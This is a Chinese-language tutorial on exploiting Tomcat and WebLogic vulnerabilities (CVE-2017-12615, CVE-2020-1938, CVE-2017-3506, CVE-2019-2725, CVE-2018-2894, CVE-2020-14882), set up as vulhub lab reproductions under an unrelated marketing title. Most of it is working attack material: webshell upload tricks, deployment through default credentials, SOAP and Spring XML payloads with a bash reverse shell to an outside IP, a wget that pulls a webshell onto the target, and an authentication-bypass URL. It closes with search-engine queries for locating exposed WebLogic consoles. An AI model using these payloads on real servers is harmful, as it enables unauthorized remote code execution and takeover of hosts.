商城网站开发方案关于营销的最新的新闻
1.Tomcat
Tomcat介绍
tomcat是⼀个开源而且免费的jsp服务器,默认端口 : 8080,属于轻量级应⽤服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的⼀款环境。
在历史上也披露出来了很多的漏洞 , 这⾥我们讲几个经典的漏洞复现
1.1 CVE-2017-12615
漏洞描述
当在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏洞产
⽣,(需要允许put请求) , 攻击者可以利⽤PUT方法通过精心构造的数据包向存在漏洞的服务器里面上
传 jsp⼀句话文件,从而造成远程命令执行,getshell等。
环境搭建
cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d
漏洞复现
用BP抓包获取数据
然后用哥斯拉来生成一个jsp木马
管理-->生成
在头部改成PUT提交;写上文件名
下面写我们的木马语句
在这里我们得绕过;他会过滤掉我们的jsp
PUT/1.jsp/
PUT/1.jsp%20
PUT/1.jsp::$DATA
我们去访问;上传成功就去连接
1.2 后台弱口令部署war包
在tomcat8环境下默认进入后台的密码为 tomcat/tomcat ,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令(前提人家必须是弱口令)
漏洞复现
在我们之前生成的jsp木马(1.jsp)给他打包成zip;后缀改位war
我们去访问一下访问成功就去连接
1.3 CVE-2020-1938(文件包含)
由于Tomcat AJP协议设计上的缺陷,攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所有
Webapp目录下的任意文件
漏洞复现
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 8.155.7.133
2.WebLogic
Weblogic介绍
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间 件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据 库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开 发、集成、部署和管理之中。
2.1 后台弱口令GetShell
#靶场搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
默认账号密码:weblogic/Oracle@123
weblogic常用弱口令:https://cirt.net/passwords?criteria=weblogic
这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。
地址/console/login/LoginForm.jsp
1.登录后台后,点击部署,点击安装,点击上传⽂件
2.上传war包,jsp木马压缩成zip,修改后缀为war,上传
可以看到我们的war包
然后去访问我们的木马;哥斯拉连接
2.2 CVE-2017-3506
cd vulhub-master/weblogic/weak_password
docker-compose up -d漏洞复现
#访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType111.验证是否存在wls-wsat组件
/wls-wsat/CoordinatorPortType
2.在当前页面抓包之后,添加下面请求包,反弹shell。
先监听我们的6666端口
修改请求方式;构造POC
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i >& /dev/tcp/8.155.7.133/6666 0>&1</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>反弹成功
2.3 CVE-2019-2725
wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该
WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得⽬
标服务器的权限,在未授权的情况下远程执行命令。
cd vulhub-master/weblogic/weak_password
docker-compose up -d漏洞复现
IP地址/_async/AsyncResponseService如果出现以下页面,则说明存在漏洞
2.在当前页面抓包 , 修改请求包 , 写入shell
现在我们的home下创建1.txt;并写进jsp木马
python3 -m http.server 6666
修改请求方法;构造POC
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://8.155.7.133/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>3.访问下载到weblogic服务器上的木马
ip地址/bea_wls_internal/678.jsp
2.4 CVE-2018-2628
#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d漏洞复现
者直接使用利用ONE-FOX⼯具(Liqun⼯具箱)
2.5 CVE-2018-2894
#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep passwordWeblogic Web Service Test Page中⼀处任意⽂件上传漏洞,Web Service Test Page 在 "⽣产模式" 下默认不开启,所以该漏洞有⼀定限制。
设置Web服务测试开启
IP地址/console/login/LoginForm.jsp
设置web服务测试开启: 域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚
点击保存 ;进入 config.do 文件进行设置,将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的,这⼀点很重要
IP地址/ws_utc/config.do
#更改目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
漏洞复现
1.点击安全 , 点击添加
2.右键审查元素 , 然后搜索16 , 找到对应时间戳
这个是我们的时间戳
121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp
2.6 CVE-2020-14882
WebLogic远程代码执行漏洞
CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。
CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。
使用这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机
#靶场搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d漏洞复现
#访问管理控制台
http://IP:7001/console/login/LoginForm.jsp
#使⽤以下url绕过登录认证
http://IP:7001/console/css/%252e%252e%252fconsole.portal
未授权访问绕过
http://IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabe=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")可以看到执行成功了
这种利用方法只能在 Weblogic 12.2.1 及以上版本中使用,因为 10.3.6 没有 class
另外⼀种⽅式
#制作一个恶意XML文件,将其提供到Weblogic可以访问得服务器上
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instancexsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/8.155.7.133/6666 0>&1]]></value>
</list>
</constructor-arg></bean>
</beans>#然后通过以下 URL,Weblogic 将加载此 XML 并执⾏其中的命令
http://8.155.7.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.155.7.133:8888/1.xml")实战挖掘
"weblogic"
app="Oracle-WebLogic-Server-管理控制台"
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
推荐 :
"WebLogic" && port="7001" && country="CN" && title=="Error 404--Not Found"